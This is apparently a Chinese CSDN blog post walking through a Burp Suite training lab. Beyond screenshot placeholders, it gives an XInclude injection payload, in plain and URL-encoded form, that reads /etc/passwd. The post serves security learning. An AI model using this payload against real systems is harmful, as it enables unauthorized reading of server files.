burpsuit 靶场(Essential skills)

文章揭示了一种利用XML的XInclude特性来尝试访问敏感文件,如/etc/passwd的漏洞。这种攻击方式通过恶意构造XML文档,可以尝试包含本地文件,从而可能导致系统安全风险。读者应关注此类漏洞,加强系统防护。
摘要由CSDN通过智能技术生成

通过有针对性的扫描快速发现漏洞

image-20221230183040244

image-20221230185622568

image-20221230185642409

image-20221230185937254

找到这个

image-20221230190241099

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
       <xi:include parse="text" href="file:///etc/passwd"/>
</foo>
<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude">
+++++++<xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/>
</foo>

image-20221230190203227

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值